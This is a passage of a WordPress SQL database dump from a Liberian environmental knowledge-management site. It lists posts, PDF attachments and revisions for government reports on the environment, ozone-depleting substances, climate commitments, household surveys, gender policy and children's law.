Second State of the Environment Report and First National Environmental Action Plan which have been long coming, saying “the first SoER was developed and launched in 2006 with support from the United Nations Development Program (UNDP) and today we have gathered to launch the 2nd SoER in accordance with the Environmental Protection and Management Law of Liberia (EPML). The EPML provides that a SoER should be produced every Five (5) years.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He recalled that in 2016, EPA negotiated with the Liberia Forest Sector Project (LFSP) and pushed for this to be done and the World Bank (WB) accepted the proposal “for which we are grateful. The process has been tedious and we are grateful that a Liberian Firm, GREENCONS, competed with other international firms to develop the SOER and NEAP and, we are glad they have completed the work. “</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prof. Tarpeh: “The SoER for 2007-2018 and its NEAP for 2019-2023 have been developed and completed. The report reveals the current condition of the environment in Liberia. It presents an overview of the country, the state of the environment and trends under various themes: agriculture, water, forestry and biodiversity, atmospheric, geology and soils, terrestrial and aquatic ecology, climate change etc., as well as the important linkages between environment and poverty, health and the potential value of ecosystems services. Based on information contained in the report, it is clear that Liberia is endowed with rich forest reserve and biodiversity hotspots; however, the country faces environmental and social challenges. It is therefore incumbent upon us to improve the state of our environment and promote prosperity for current and future generations. We anticipate that findings in the NEAP will be mainstreamed into national and sectoral planning and contribute to decision making for the betterment of Liberia.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He acknowledged REDD+ Implementation Unit (RIU) and FDA for their collaboration and supports, the Consulting firm, GREENCONS, the EPA Focal Point, Mr. Z. Elijah Whapoe who supervised the development of the SoER and NEAP, saying “we remained forever grateful to our ESIA technical committee, the folks at the department of Planning and Policy for helping to make this happened.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also extended profound thanks and appreciation to the Government of Norway for the financial contribution that enabled EPA to produce the Second State of Environment Report and the First National Environmental Action Plan. “Additionally, the World Bank Country Office here in Monrovia for the cooperation and guidance to enable us access the financial resources through the Liberia Forest Sector Programme. Kindly allow me to also thank the various line ministries, agencies and commissions that assisted in producing the Report and Action Plan,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For her part, Deputy Finance Minister for Budget and Development Planning, Tanneh G. Brunson, said the report could not have been launched at a more critical time than now when the government is exploring opportunities to foster economic growth and development to improve the livelihood of citizens and also in the face of growing environmental challenges in countries around the world including Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She said the report covers wide range of issues from terrestrial resources to aquatic and atmospheric resources as well as cross-section resources and environmental linkages, adding that all of these concern the green and blue economy of the SDGs goal 15 (life on land) and SDGs goal 14 (life under water.)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“I cannot overemphasized the significance of issues expressed in &nbsp;this report to our existence in terms of our livelihood, cultural and social stability, our health, economic growth and development and our future prosperity,” she said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She said the report provides series of recommendations to various issues across all sectors that policymakers and technicians need to use as guide.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Deputy Minister Brunson reaffirms government’s commitment to the allocation of funding through the national budget “as we look to our donor partners for support to the EPA and all other institutions concerned with addressing the critical issues highlighted in this report.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The specific objectives of the launch of the SoER and NEAP are: to present the SoE Report and NEAP to the Government of Liberia, its partners and the general public; increase public awareness and education on the environment of Liberia for informed policy decision-making; give insight on the linkages between environment and sustainable development; solicit buy-in from policymakers in strengthening environmental governance in the country; and rally donor supports to address environmental issues outlined in the NEAP and the subsequent preparation of SoER.</p>\n<!-- /wp:paragraph -->','Gov’t Launches State of Environment Report','','inherit','closed','closed','','4400-revision-v1','','','2021-09-28 16:21:13','2021-09-28 16:21:13','',4400,'https://ekmsliberia.info/?p=4402',0,'revision','',0),(4404,42,'2021-09-28 17:48:32','2021-09-28 17:48:32','The ODS alternatives survey was conducted in response to decision XXXVI/9 which provided for  Article 5 countries to receive financial support from the MLF to carry out the survey. The objectives of the survey was to assist Article 5 countries to better understand their consumption trends for non-ODS alternatives, and their distribution by sector and sub-sector; establish a bank of inventories on ODS alternatives which will provide the country with an overview of its national market where ODS alternatives have been and will be phased in, while taking into consideration existing technologies; and To estimate the amounts of each ODS alternative currently used in the country, identify alternatives that could be potentially used in the future to replace HCFCs and HFCs; and forecast the amounts of each ODS alternative\r\ncurrently used and potentially to be used in the country for the period 2015-2030.','ODS ALTERNATIVES SURVEY REPORT','','publish','closed','closed','','ods-alternatives-survey-report','','','2021-09-28 17:48:32','2021-09-28 17:48:32','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4404',78,'document','',0),(4405,42,'2021-09-28 17:46:30','2021-09-28 17:46:30','','ods survey','','inherit','open','closed','','ods-survey','','','2021-09-28 17:46:30','2021-09-28 17:46:30','',4404,'https://ekmsliberia.info/wp-content/uploads/2021/09/ods-survey.png',0,'attachment','image/png',0),(4406,42,'2021-09-28 17:46:57','2021-09-28 17:46:57','','LIBERIA\'S ODS ALTERNATIVES SURVEY REPORT','','inherit','open','closed','','liberias-ods-alternatives-survey-report','','','2021-09-28 17:46:57','2021-09-28 17:46:57','',4404,'https://ekmsliberia.info/wp-content/uploads/2021/09/LIBERIAS-ODS-ALTERNATIVES-SURVEY-REPORT.pdf',0,'attachment','application/pdf',0),(4407,42,'2021-09-28 17:48:32','2021-09-28 17:48:32','The ODS alternatives survey was conducted in response to decision XXXVI/9 which provided for  Article 5 countries to receive financial support from the MLF to carry out the survey. The objectives of the survey was to assist Article 5 countries to better understand their consumption trends for non-ODS alternatives, and their distribution by sector and sub-sector; establish a bank of inventories on ODS alternatives which will provide the country with an overview of its national market where ODS alternatives have been and will be phased in, while taking into consideration existing technologies; and To estimate the amounts of each ODS alternative currently used in the country, identify alternatives that could be potentially used in the future to replace HCFCs and HFCs; and forecast the amounts of each ODS alternative\r\ncurrently used and potentially to be used in the country for the period 2015-2030.','ODS ALTERNATIVES SURVEY REPORT','','inherit','closed','closed','','4404-revision-v1','','','2021-09-28 17:48:32','2021-09-28 17:48:32','',4404,'https://ekmsliberia.info/?p=4407',0,'revision','',0),(4408,42,'2021-09-28 18:01:15','2021-09-28 18:01:15','The purpose of this report is to verify Hydrochlorofluorocarbon (HCFC) consumption for the period 2016 to 2020 under the implementation of the Hydrochlorofluorocarbon Phase out Management Plan (HPMP) in Liberia and to make recommendations for actions. The report is restricted to imports ofHCFC-22, which is currently the only ones used in the country. The ODS Regulations of 2004, was amended and approved in 2010 to make provision for HCFC and is undergoing another amendment to provide for HFCs. The NOU issues HCFC import licenses to assist in capturing data for record keeping purposes. A review of the consumption patterns of HCFC shows a continuous decline in the consumption of the substance.','Verification of Hydrochlorofluorocarbon (HCFC) Imports and Licensing System in Liberia (2016-2020)','','publish','closed','closed','','verification-of-hydrochlorofluorocarbon-hcfc-imports-and-licensing-system-in-liberia-2016-2020','','','2021-09-28 18:01:15','2021-09-28 18:01:15','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4408',77,'document','',0),(4409,42,'2021-09-28 17:59:47','2021-09-28 17:59:47','','NOU','','inherit','open','closed','','nou','','','2021-09-28 17:59:47','2021-09-28 17:59:47','',4408,'https://ekmsliberia.info/wp-content/uploads/2021/09/NOU.png',0,'attachment','image/png',0),(4410,42,'2021-09-28 18:00:15','2021-09-28 18:00:15','','Hydrochlorofluoprocarbon Verification Report for Liberia','','inherit','open','closed','','hydrochlorofluoprocarbon-verification-report-for-liberia','','','2021-09-28 18:00:15','2021-09-28 18:00:15','',4408,'https://ekmsliberia.info/wp-content/uploads/2021/09/Hydrochlorofluoprocarbon-Verification-Report-for-Liberia.pdf',0,'attachment','application/pdf',0),(4411,42,'2021-09-28 18:01:15','2021-09-28 18:01:15','The purpose of this report is to verify Hydrochlorofluorocarbon (HCFC) consumption for the period 2016 to 2020 under the implementation of the Hydrochlorofluorocarbon Phase out Management Plan (HPMP) in Liberia and to make recommendations for actions. The report is restricted to imports ofHCFC-22, which is currently the only ones used in the country. The ODS Regulations of 2004, was amended and approved in 2010 to make provision for HCFC and is undergoing another amendment to provide for HFCs. The NOU issues HCFC import licenses to assist in capturing data for record keeping purposes. A review of the consumption patterns of HCFC shows a continuous decline in the consumption of the substance.','Verification of Hydrochlorofluorocarbon (HCFC) Imports and Licensing System in Liberia (2016-2020)','','inherit','closed','closed','','4408-revision-v1','','','2021-09-28 18:01:15','2021-09-28 18:01:15','',4408,'https://ekmsliberia.info/?p=4411',0,'revision','',0),(4412,42,'2021-09-28 19:47:39','2021-09-28 19:47:39','Nationally Determined Contributions (NDCs) are at the core of the Paris Agreement (PA), under which 191 countries, including Liberia, committed to limit global warming to “well below 2 degrees above preindustrial levels,” and to pursue efforts to limit the temperature increase to 1.5°C. NDCs are the delivery mechanism to reach the PA goals and achieving the overall global greenhouse gas (GHG) mitigation target, embodying efforts by each country to reduce national emissions and adapt to the impacts of climate change. The Paris Agreement requests countries to develop and submit updated NDCs every five years to the United Nations Framework Conventions on Climate Change (UNFCCC) Secretariat. These NDCs are expected to reflect increased ambition, whether in terms of strengthened targets, accelerated timelines, or a broader scope covering additional sectors or greenhouse gases. Liberia submitted her first NDC in 2015 and committed to revising and submitting an updated version as required by the Paris Agreement.','Liberia’s Revised Nationally Determined Contribution (NDC)','','publish','closed','closed','','liberias-revised-nationally-determined-contribution-ndc','','','2021-09-28 19:47:39','2021-09-28 19:47:39','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4412',76,'document','',0),(4413,42,'2021-09-28 19:45:03','2021-09-28 19:45:03','','ndc','','inherit','open','closed','','ndc-3','','','2021-09-28 19:45:03','2021-09-28 19:45:03','',4412,'https://ekmsliberia.info/wp-content/uploads/2021/09/ndc-1.png',0,'attachment','image/png',0),(4414,42,'2021-09-28 19:45:37','2021-09-28 19:45:37','','Liberia\'s Updated NDC_RL_FINAL (002)','','inherit','open','closed','','liberias-updated-ndc_rl_final-002','','','2021-09-28 19:45:37','2021-09-28 19:45:37','',4412,'https://ekmsliberia.info/wp-content/uploads/2021/09/Liberias-Updated-NDC_RL_FINAL-002.pdf',0,'attachment','application/pdf',0),(4415,42,'2021-09-28 19:47:39','2021-09-28 19:47:39','Nationally Determined Contributions (NDCs) are at the core of the Paris Agreement (PA), under which 191 countries, including Liberia, committed to limit global warming to “well below 2 degrees above preindustrial levels,” and to pursue efforts to limit the temperature increase to 1.5°C. NDCs are the delivery mechanism to reach the PA goals and achieving the overall global greenhouse gas (GHG) mitigation target, embodying efforts by each country to reduce national emissions and adapt to the impacts of climate change. The Paris Agreement requests countries to develop and submit updated NDCs every five years to the United Nations Framework Conventions on Climate Change (UNFCCC) Secretariat. These NDCs are expected to reflect increased ambition, whether in terms of strengthened targets, accelerated timelines, or a broader scope covering additional sectors or greenhouse gases. Liberia submitted her first NDC in 2015 and committed to revising and submitting an updated version as required by the Paris Agreement.','Liberia’s Revised Nationally Determined Contribution (NDC)','','inherit','closed','closed','','4412-revision-v1','','','2021-09-28 19:47:39','2021-09-28 19:47:39','',4412,'https://ekmsliberia.info/?p=4415',0,'revision','',0),(4416,42,'2021-09-28 19:57:38','2021-09-28 19:57:38','Agriculture sector is the main source of livelihoods for approximately 80 percent of Liberia’s population. The sector plays an integral role in Liberia’s economic and social development as  it contributes significantly to employment, food security and household income. In 2016, the agricultural sector accounted for around 26 percent of the real Gross Domestic Product (GDP), approximately one third of which originates in the livestock sub-sectors.','LIBERIA POVERTY ASSESSMENTSTATISTICAL ABSTRACT AGRICULTURE RECALL SURVEY 2016','','publish','closed','closed','','liberia-poverty-assessmentstatistical-abstract-agriculture-recall-survey-2016','','','2021-09-28 19:57:38','2021-09-28 19:57:38','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4416',75,'document','',0),(4417,42,'2021-09-28 19:56:02','2021-09-28 19:56:02','','lisgis','','inherit','open','closed','','lisgis','','','2021-09-28 19:56:02','2021-09-28 19:56:02','',4416,'https://ekmsliberia.info/wp-content/uploads/2021/09/lisgis.png',0,'attachment','image/png',0),(4418,42,'2021-09-28 19:56:30','2021-09-28 19:56:30','','Final Agriculture Recall chapter 2016 (1)(1)','','inherit','open','closed','','final-agriculture-recall-chapter-2016-11','','','2021-09-28 19:56:30','2021-09-28 19:56:30','',4416,'https://ekmsliberia.info/wp-content/uploads/2021/09/Final-Agriculture-Recall-chapter-2016-11.pdf',0,'attachment','application/pdf',0),(4419,42,'2021-09-28 19:57:38','2021-09-28 19:57:38','Agriculture sector is the main source of livelihoods for approximately 80 percent of Liberia’s population. The sector plays an integral role in Liberia’s economic and social development as  it contributes significantly to employment, food security and household income. In 2016, the agricultural sector accounted for around 26 percent of the real Gross Domestic Product (GDP), approximately one third of which originates in the livestock sub-sectors.','LIBERIA POVERTY ASSESSMENTSTATISTICAL ABSTRACT AGRICULTURE RECALL SURVEY 2016','','inherit','closed','closed','','4416-revision-v1','','','2021-09-28 19:57:38','2021-09-28 19:57:38','',4416,'https://ekmsliberia.info/?p=4419',0,'revision','',0),(4420,42,'2021-09-28 20:07:49','2021-09-28 20:07:49','The HIES 2016 represents a milestone in the history of statistics in Liberia as it is the country’s first year long survey that is statistically representative at the National, Regional and County level. The multi-year project started with the first attempt of the HIES in 2014 which unfortunately had to be halted due to the Ebola Virus Disease (EVD) outbreak. A rerun of the HIES was started in January 2016 and this report marks its successful completion. The project was implemented by the Liberia Institute of Statistics and GeoInformation Services (LISGIS), with support from the Government of Liberia (GoL) as well as from the World Bank (WB), the European Union (EU), the United States Agency for International Development (USAID), the Swedish International Development Corporation Agency (Sida) and the African Development Bank (AfDB).','Household Income and  Expenditure Survey 2016','','publish','closed','closed','','household-income-and-expenditure-survey-2016','','','2021-09-28 20:08:38','2021-09-28 20:08:38','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4420',74,'document','',0),(4421,42,'2021-09-28 20:03:48','2021-09-28 20:03:48','','lisgis','','inherit','open','closed','','lisgis-2','','','2021-09-28 20:03:48','2021-09-28 20:03:48','',4420,'https://ekmsliberia.info/wp-content/uploads/2021/09/lisgis-1.png',0,'attachment','image/png',0),(4422,42,'2021-09-28 20:06:35','2021-09-28 20:06:35','','HIES 2016_StatisticalAbstract_Final_final','','inherit','open','closed','','hies-2016_statisticalabstract_final_final','','','2021-09-28 20:06:35','2021-09-28 20:06:35','',4420,'https://ekmsliberia.info/wp-content/uploads/2021/09/HIES-2016_StatisticalAbstract_Final_final.pdf',0,'attachment','application/pdf',0),(4423,42,'2021-09-28 20:07:49','2021-09-28 20:07:49','The HIES 2016 represents a milestone in the history of statistics in Liberia as it is the country’s first year long survey that is statistically representative at the National, Regional and County level. The multi-year project started with the first attempt of the HIES in 2014 which unfortunately had to be halted due to the Ebola Virus Disease (EVD) outbreak. A rerun of the HIES was started in January 2016 and this report marks its successful completion. The project was implemented by the Liberia Institute of Statistics and GeoInformation Services (LISGIS), with support from the Government of Liberia (GoL) as well as from the World Bank (WB), the European Union (EU), the United States Agency for International Development (USAID), the Swedish International Development Corporation Agency (Sida) and the African Development Bank (AfDB).','Household Income and  Expenditure Survey 2016','','inherit','closed','closed','','4420-revision-v1','','','2021-09-28 20:07:49','2021-09-28 20:07:49','',4420,'https://ekmsliberia.info/?p=4423',0,'revision','',0),(4424,42,'2021-09-28 20:31:39','2021-09-28 20:31:39','The agriculture sector, including community value chains such as cocoa, oil palm, rubber and the forestry sector (especially timber value chain), contribute significantly to economic growth and development in Liberia. These sectors will face many challenges in the coming years as the land suitable for cultivation continues to decline, due to the large areas of land which have been appropriated by concessions, deforestation, land conflicts, and climate change, amongst others. The ability to cope with these challenges in the midst of rapidly rising demands for cocoa, oil palm, rubber and timber products by consumers will require the inclusion of everyone – men, women and youth - along the value chains in order to avoid destruction of forests. According to the International Finance Corporation (IFC) (2019)1, one of the main\r\nsolutions to coping with these challenges in a sustainable manner is to improve women’s access to assets, including land, to enable them to fully participate in all aspects of agriculture and forestry value chains. Women should also have equal access to and control of land and other related natural resources.','Gender Assessment of the Policy Environment  in Relation to the Cocoa, Oil Palm, Rubber and Timber Value Chains in Liberia','','publish','closed','closed','','gender-assessment-of-the-policy-environment-in-relation-to-the-cocoa-oil-palm-rubber-and-timber-value-chains-in-liberia','','','2021-09-28 20:31:39','2021-09-28 20:31:39','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4424',73,'document','',0),(4425,42,'2021-09-28 20:29:57','2021-09-28 20:29:57','','gender','','inherit','open','closed','','gender-4','','','2021-09-28 20:29:57','2021-09-28 20:29:57','',4424,'https://ekmsliberia.info/wp-content/uploads/2021/09/gender.png',0,'attachment','image/png',0),(4426,42,'2021-09-28 20:30:23','2021-09-28 20:30:23','','genderassessment_liberia(1)','','inherit','open','closed','','genderassessment_liberia1','','','2021-09-28 20:30:23','2021-09-28 20:30:23','',4424,'https://ekmsliberia.info/wp-content/uploads/2021/09/genderassessment_liberia1.pdf',0,'attachment','application/pdf',0),(4427,42,'2021-09-28 20:31:39','2021-09-28 20:31:39','The agriculture sector, including community value chains such as cocoa, oil palm, rubber and the forestry sector (especially timber value chain), contribute significantly to economic growth and development in Liberia. These sectors will face many challenges in the coming years as the land suitable for cultivation continues to decline, due to the large areas of land which have been appropriated by concessions, deforestation, land conflicts, and climate change, amongst others. The ability to cope with these challenges in the midst of rapidly rising demands for cocoa, oil palm, rubber and timber products by consumers will require the inclusion of everyone – men, women and youth - along the value chains in order to avoid destruction of forests. According to the International Finance Corporation (IFC) (2019)1, one of the main\r\nsolutions to coping with these challenges in a sustainable manner is to improve women’s access to assets, including land, to enable them to fully participate in all aspects of agriculture and forestry value chains. Women should also have equal access to and control of land and other related natural resources.','Gender Assessment of the Policy Environment  in Relation to the Cocoa, Oil Palm, Rubber and Timber Value Chains in Liberia','','inherit','closed','closed','','4424-revision-v1','','','2021-09-28 20:31:39','2021-09-28 20:31:39','',4424,'https://ekmsliberia.info/?p=4427',0,'revision','',0),(4428,42,'2021-09-28 20:51:25','2021-09-28 20:51:25','This Act is and shall be called An Act to Amend the New Executive Law of 1972 to establish the Ministry of Gender, Children and Social Protection. The objective of this Act is to amend the Acts establishing the Ministry of Gender and Development and the Ministry of Health and Social Welfare to create and establish the Ministry of Gender, Children and Social Protection.','AN ACT To Amend Chapter 38 Ministry of Gender and Development, Of the Executive Law, To Establish','','publish','closed','closed','','an-act-to-amend-chapter-38-ministry-of-gender-and-development-of-the-executive-law-to-establish','','','2021-09-28 20:51:25','2021-09-28 20:51:25','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4428',72,'document','',0),(4429,42,'2021-09-28 20:49:10','2021-09-28 20:49:10','','gender','','inherit','open','closed','','gender-5','','','2021-09-28 20:49:10','2021-09-28 20:49:10','',4428,'https://ekmsliberia.info/wp-content/uploads/2021/09/gender-1.png',0,'attachment','image/png',0),(4430,42,'2021-09-28 20:49:35','2021-09-28 20:49:35','','REVISED DRAFT 6 Act_to_establish_Ministry_of_Gender_and_Social_Welfare_Revised Final (1)','','inherit','open','closed','','revised-draft-6-act_to_establish_ministry_of_gender_and_social_welfare_revised-final-1','','','2021-09-28 20:49:35','2021-09-28 20:49:35','',4428,'https://ekmsliberia.info/wp-content/uploads/2021/09/REVISED-DRAFT-6-Act_to_establish_Ministry_of_Gender_and_Social_Welfare_Revised-Final-1.pdf',0,'attachment','application/pdf',0),(4431,42,'2021-09-28 20:51:25','2021-09-28 20:51:25','This Act is and shall be called An Act to Amend the New Executive Law of 1972 to establish the Ministry of Gender, Children and Social Protection. The objective of this Act is to amend the Acts establishing the Ministry of Gender and Development and the Ministry of Health and Social Welfare to create and establish the Ministry of Gender, Children and Social Protection.','AN ACT To Amend Chapter 38 Ministry of Gender and Development, Of the Executive Law, To Establish','','inherit','closed','closed','','4428-revision-v1','','','2021-09-28 20:51:25','2021-09-28 20:51:25','',4428,'https://ekmsliberia.info/?p=4431',0,'revision','',0),(4432,42,'2021-09-28 20:58:25','2021-09-28 20:58:25','This Strategic Plan (2016-2021) starts off from a perspective that Liberia’s greatest opportunity for development is in its people. Getting them to attain their full potential is the core business of the Ministry of Gender, Children, and Social Protection (MGCSP). An estimated 53% of our population falls between the ages of 16 and 64 years—the most productive period in their life cycle. About 44% are children 15 years old and below and have just begun their life’s journey. The forecast is for an additional 151,000 citizens every year as our population grows from an estimated 4.75 million on January 1, 2016 to 5.1 million by January 1, 2021—the period covered by this Strategic Plan. Our life expectancy is also rising incrementally-despite the setback caused by the outbreak of the Ebola Virus Disease in 2014. Unfortunately slightly more than 8 out of every 10 Liberians is struggling and can be classified as vulnerable in one form or another.','STRATEGIC PLAN Executive Summary & Strategic Priorities','','publish','closed','closed','','strategic-plan-executive-summary-strategic-priorities','','','2021-09-28 20:58:25','2021-09-28 20:58:25','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4432',71,'document','',0),(4433,42,'2021-09-28 20:55:56','2021-09-28 20:55:56','','gender','','inherit','open','closed','','gender-6','','','2021-09-28 20:55:56','2021-09-28 20:55:56','',4432,'https://ekmsliberia.info/wp-content/uploads/2021/09/gender-2.png',0,'attachment','image/png',0),(4434,42,'2021-09-28 20:56:29','2021-09-28 20:56:29','','Summarized Strategic Plan 2016to2021 Draft(1)','','inherit','open','closed','','summarized-strategic-plan-2016to2021-draft1','','','2021-09-28 20:56:29','2021-09-28 20:56:29','',4432,'https://ekmsliberia.info/wp-content/uploads/2021/09/Summarized-Strategic-Plan-2016to2021-Draft1.pdf',0,'attachment','application/pdf',0),(4435,42,'2021-09-28 20:58:25','2021-09-28 20:58:25','This Strategic Plan (2016-2021) starts off from a perspective that Liberia’s greatest opportunity for development is in its people. Getting them to attain their full potential is the core business of the Ministry of Gender, Children, and Social Protection (MGCSP). An estimated 53% of our population falls between the ages of 16 and 64 years—the most productive period in their life cycle. About 44% are children 15 years old and below and have just begun their life’s journey. The forecast is for an additional 151,000 citizens every year as our population grows from an estimated 4.75 million on January 1, 2016 to 5.1 million by January 1, 2021—the period covered by this Strategic Plan. Our life expectancy is also rising incrementally-despite the setback caused by the outbreak of the Ebola Virus Disease in 2014. Unfortunately slightly more than 8 out of every 10 Liberians is struggling and can be classified as vulnerable in one form or another.','STRATEGIC PLAN Executive Summary & Strategic Priorities','','inherit','closed','closed','','4432-revision-v1','','','2021-09-28 20:58:25','2021-09-28 20:58:25','',4432,'https://ekmsliberia.info/?p=4435',0,'revision','',0),(4436,42,'2021-09-28 21:05:58','2021-09-28 21:05:58','This Law to establish the Children’s Law of Liberia, 2011 shall be cited as the “Children’s Law of 2011”. The rights and correlative duties stipulated in this Law shall constitute a Bill of Child Rights.','AN ACT TO ESTABLISH THE CHILDREN’S LAW OF LIBERIA, 2011','','publish','closed','closed','','an-act-to-establish-the-childrens-law-of-liberia-2011','','','2021-09-28 21:05:58','2021-09-28 21:05:58','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4436',70,'document','',0),(4437,42,'2021-09-28 21:04:34','2021-09-28 21:04:34','','gender','','inherit','open','closed','','gender-7','','','2021-09-28 21:04:34','2021-09-28 21:04:34','',4436,'https://ekmsliberia.info/wp-content/uploads/2021/09/gender-3.png',0,'attachment','image/png',0),(4438,42,'2021-09-28 21:05:07','2021-09-28 21:05:07','','Liberia_Childrens_Law2011(1)','','inherit','open','closed','','liberia_childrens_law20111','','','2021-09-28 21:05:07','2021-09-28 21:05:07','',4436,'https://ekmsliberia.info/wp-content/uploads/2021/09/Liberia_Childrens_Law20111.pdf',0,'attachment','application/pdf',0),(4439,42,'2021-09-28 21:05:58','2021-09-28 21:05:58','This Law to establish the Children’s Law of Liberia, 2011 shall be cited as the “Children’s Law of 2011”. The rights and correlative duties stipulated in this Law shall constitute a Bill of Child Rights.','AN ACT TO ESTABLISH THE CHILDREN’S LAW OF LIBERIA, 2011','','inherit','closed','closed','','4436-revision-v1','','','2021-09-28 21:05:58','2021-09-28 21:05:58','',4436,'https://ekmsliberia.info/?p=4439',0,'revision','',0),(4440,42,'2021-09-29 14:59:34','2021-09-29 14:59:34','The publication is an outcome of a consultancy to produce and distribute updated environmental codes, laws and relevant texts pertaining to the Rio Conventions implementation in Liberia from 2006 to 2019. The Liberia Environmental Protection Agency (LEPA) and United Nations Development Programme (UNDP) is implementing a Global Environment Facility (GEF) funded Cross - Cutting Capacity Development (CCCD) project which aim to support the Government of Liberia strengthen national capacities to meet global environmental obligations with the framework of the sustainable development priorities. The goal of the assessment is to improve the implementation of the three (3) Rio Conventions (United Nations Convention on Biological Diversity, United Nations Framework Convention on Climate Change, and United Nations Convention to Combat Desertification) through development of national capacities to better coordinate and generate information related to the implementation of these Conventions.','National Forestry and Wildlife Policies Mainstreaming United Nations Convention on Biological Diversity','','publish','closed','closed','','national-forestry-and-wildlife-policies-mainstreaming-united-nations-convention-on-biological-diversity','','','2021-09-29 14:59:34','2021-09-29 14:59:34','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4440',69,'document','',0),(4441,42,'2021-09-29 14:57:02','2021-09-29 14:57:02','','biodiversity updated laws','','inherit','open','closed','','biodiversity-updated-laws','','','2021-09-29 14:57:02','2021-09-29 14:57:02','',4440,'https://ekmsliberia.info/wp-content/uploads/2021/09/biodiversity-updated-laws.png',0,'attachment','image/png',0),(4442,42,'2021-09-29 14:57:24','2021-09-29 14:57:24','','Biological Diversity','','inherit','open','closed','','biological-diversity','','','2021-09-29 14:57:24','2021-09-29 14:57:24','',4440,'https://ekmsliberia.info/wp-content/uploads/2021/09/Biological-Diversity.pdf',0,'attachment','application/pdf',0),(4443,42,'2021-09-29 14:59:34','2021-09-29 14:59:34','The publication is an outcome of a consultancy to produce and distribute updated environmental codes, laws and relevant texts pertaining to the Rio Conventions implementation in Liberia from 2006 to 2019. The Liberia Environmental Protection Agency (LEPA) and United Nations Development Programme (UNDP) is implementing a Global Environment Facility (GEF) funded Cross - Cutting Capacity Development (CCCD) project which aim to support the Government of Liberia strengthen national capacities to meet global environmental obligations with the framework of the sustainable development priorities. The goal of the assessment is to improve the implementation of the three (3) Rio Conventions (United Nations Convention on Biological Diversity, United Nations Framework Convention on Climate Change, and United Nations Convention to Combat Desertification) through development of national capacities to better coordinate and generate information related to the implementation of these Conventions.','National Forestry and Wildlife Policies Mainstreaming United Nations Convention on Biological Diversity','','inherit','closed','closed','','4440-revision-v1','','','2021-09-29 14:59:34','2021-09-29 14:59:34','',4440,'https://ekmsliberia.info/?p=4443',0,'revision','',0),(4444,42,'2021-09-29 15:04:10','2021-09-29 15:04:10','The publication is an outcome of a consultancy to produce and distribute updated environmental codes, laws and relevant texts pertaining to the Rio Conventions implementation in Liberia from 2006 to 2019. The Liberia Environmental Protection Agency (LEPA) and United Nations Development Programme (UNDP) is implementing a Global Environment Facility (GEF) funded Cross - Cutting Capacity Development (CCCD) project which aim to support the Government of Liberia strengthen national capacities to meet global environmental obligations with the framework of the sustainable development priorities.The goal of the assessment is to improve the implementation of the three (3) Rio Conventions (United Nations Convention on Biological Diversity, United Nations Framework Convention on Climate Change, and United Nations Convention to Combat Desertification) through development of national capacities to better coordinate and generate information related to the implementation of these Conventions.','Environmental Legislations and Policies Mainstreaming the United Nations Framework Convention on Climate Change in Liberiia','','publish','closed','closed','','environmental-legislations-and-policies-mainstreaming-the-united-nations-framework-convention-on-climate-change-in-liberiia','','','2021-09-29 15:04:10','2021-09-29 15:04:10','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4444',68,'document','',0),(4445,42,'2021-09-29 15:03:00','2021-09-29 15:03:00','','climate change','','inherit','open','closed','','climate-change-3','','','2021-09-29 15:03:00','2021-09-29 15:03:00','',4444,'https://ekmsliberia.info/wp-content/uploads/2021/09/climate-change-1.png',0,'attachment','image/png',0),(4446,42,'2021-09-29 15:03:36','2021-09-29 15:03:36','','Climate Change','','inherit','open','closed','','climate-change-4','','','2021-09-29 15:03:36','2021-09-29 15:03:36','',4444,'https://ekmsliberia.info/wp-content/uploads/2021/09/Climate-Change.pdf',0,'attachment','application/pdf',0),(4447,42,'2021-09-29 15:04:10','2021-09-29 15:04:10','The publication is an outcome of a consultancy to produce and distribute updated environmental codes, laws and relevant texts pertaining to the Rio Conventions implementation in Liberia from 2006 to 2019. The Liberia Environmental Protection Agency (LEPA) and United Nations Development Programme (UNDP) is implementing a Global Environment Facility (GEF) funded Cross - Cutting Capacity Development (CCCD) project which aim to support the Government of Liberia strengthen national capacities to meet global environmental obligations with the framework of the sustainable development priorities.The goal of the assessment is to improve the implementation of the three (3) Rio Conventions (United Nations Convention on Biological Diversity, United Nations Framework Convention on Climate Change, and United Nations Convention to Combat Desertification) through development of national capacities to better coordinate and generate information related to the implementation of these Conventions.','Environmental Legislations and Policies Mainstreaming the United Nations Framework Convention on Climate Change in Liberiia','','inherit','closed','closed','','4444-revision-v1','','','2021-09-29 15:04:10','2021-09-29 15:04:10','',4444,'https://ekmsliberia.info/?p=4447',0,'revision','',0),(4448,42,'2021-09-29 15:08:44','2021-09-29 15:08:44','The publication is an outcome of a consultancy to produce and distribute updated environmental codes, laws and relevant texts pertaining to the Rio Conventions implementation in Liberia from 2006 to 2019. The Liberia Environmental Protection Agency (LEPA) and United Nations Development Programme (UNDP) is implementing a Global Environment Facility (GEF) funded Cross - Cutting Capacity Development (CCCD) project which aim to support the Government of Liberia strengthen national capacities to meet global environmental obligations with the framework of the sustainable development priorities. The goal of the assessment is to improve the implementation of the three (3) Rio Conventions (United Nations Convention on Biological Diversity, United Nations Framework Convention on Climate Change, and United Nations Convention to Combat Desertification) through development of national capacities to better coordinate and generate information related to the implementation of these Conventions.','Land Management Legislations and Policies of Liberia','','publish','closed','closed','','land-management-legislations-and-policies-of-liberia','','','2021-09-29 